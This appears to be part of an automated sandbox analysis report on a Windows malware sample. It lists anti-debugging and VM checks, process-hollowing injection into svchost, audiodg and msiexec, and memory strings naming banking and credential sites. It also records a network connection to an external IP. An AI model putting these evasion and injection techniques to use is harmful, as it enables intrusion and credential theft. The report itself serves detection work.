              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8F303C FindFirstFileExW,FindNextFileW,FindClose,13_2_00007FFBBB8F303C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8F3280 FindFirstFileExW,FindNextFileW,FindClose,13_2_00007FFBBB8F3280
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C1444 GetSystemInfo,0_2_00007FF7E83C1444
              Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
              Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
              Source: C:\Windows\System32\audiodg.exeThread delayed: delay time: 50000Jump to behavior
              Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 50000Jump to behavior
              Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 50000Jump to behavior
              Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
              Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
              Source: C:\Windows\System32\msiexec.exeThread delayed: delay time: 50000Jump to behavior
              Source: C:\Windows\explorer.exeThread delayed: delay time: 90000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
              Source: explorer.exe, 00000005.00000003.2284390112.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
              Source: explorer.exe, 00000005.00000003.2284390112.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2681284481.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1420653874.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
              Source: explorer.exe, 00000005.00000002.2681284481.00000000091FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
              Source: explorer.exe, 00000005.00000000.1420653874.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
              Source: explorer.exe, 00000005.00000000.1420653874.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2681284481.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2284390112.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
              Source: explorer.exe, 00000005.00000000.1420653874.0000000009255000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTcaVMWare
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002FB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690LR
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
              Source: explorer.exe, 00000005.00000003.2284390112.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
              Source: explorer.exe, 00000005.00000000.1414348563.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1700643805.0000000000B8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ
              Source: explorer.exe, 00000005.00000000.1414348563.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00=
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
              Source: explorer.exe, 00000005.00000000.1420653874.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.2681284481.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2284390112.00000000090DA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
              Source: explorer.exe, 00000005.00000000.1414348563.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1714716892.0000000003B0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
              Source: explorer.exe, 00000005.00000000.1414348563.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
              Source: F72F.tmp.ssg.exe, 00000006.00000002.1702765869.0000000002D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeAPI call chain: ExitProcess graph end nodegraph_0-929
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeAPI call chain: ExitProcess graph end nodegraph_0-924
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeAPI call chain: ExitProcess graph end nodegraph_0-928
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeAPI call chain: ExitProcess graph end nodegraph_0-947
              Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_3-873
              Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_3-882
              Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_3-877
              Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_3-886
              Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_3-896
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeAPI call chain: ExitProcess graph end nodegraph_7-926
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeAPI call chain: ExitProcess graph end nodegraph_7-921
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeAPI call chain: ExitProcess graph end nodegraph_7-924
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeAPI call chain: ExitProcess graph end nodegraph_7-944
              Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_9-873
              Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_9-883
              Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_9-885
              Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end nodegraph_9-894
              Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_10-901
              Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_10-891
              Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end nodegraph_10-899
              Source: C:\Windows\System32\audiodg.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C31AC IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_00007FF7E83C31AC
              Found API chain indicative of debugger detection
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_7-1178
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_0-1182
              Source: C:\Windows\System32\audiodg.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_9-1127
              Source: C:\Windows\System32\svchost.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_3-1129
              Source: C:\Windows\System32\msiexec.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_10-1145
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\svchost.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C31AC IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_00007FF7E83C31AC
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFC7DC4 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_0DFC7DC4
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFA8400 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,5_2_0DFA8400
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C14EC LoadLibraryA,GetProcAddress,0_2_00007FF7E83C14EC
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C2160 InternetOpenW,Sleep,InternetOpenUrlW,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,InternetCloseHandle,InternetCloseHandle,Sleep,InternetCloseHandle,InternetOpenUrlW,InternetCloseHandle,Sleep,HttpQueryInfoA,GetProcessHeap,RtlAllocateHeap,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00007FF7E83C2160
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD0340 SetUnhandledExceptionFilter,5_2_0DFD0340
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFC52F8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,InitializeCriticalSectionEx,5_2_0DFC52F8
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F24FBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF7F24FBBC0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F24FC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF7F24FC44C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F2509924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF7F2509924
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F24FC62C SetUnhandledExceptionFilter,12_2_00007FF7F24FC62C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F24FBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FF7F24FBBC0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F24FC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FF7F24FC44C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F2509924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FF7F2509924
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F24FC62C SetUnhandledExceptionFilter,13_2_00007FF7F24FC62C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8F0F20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FFBBB8F0F20
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8CA184 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FFBBB8CA184
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31E5054 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FFBC31E5054
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31E4A34 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FFBC31E4A34
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31F6810 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FFBC31F6810
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31F5DF8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FFBC31F5DF8
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC31F69F8 SetUnhandledExceptionFilter,13_2_00007FFBC31F69F8
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBC321D414 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FFBC321D414
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Benign windows process drops PE files
              Source: C:\Windows\explorer.exeFile created: F72F.tmp.ssg.exe.5.drJump to dropped file
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\explorer.exeNetwork Connect: 185.81.68.147 80Jump to behavior
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6EC840000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF67E6D0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF6345C0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF67E6D0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6EC840000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF6345C0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF67E6D0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF6345C0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6EC840000 protect: page execute and read and writeJump to behavior
              Contains functionality to inject code into remote processes
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C24CC GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,0_2_00007FF7E83C24CC
              Contains functionality to inject threads in other processes
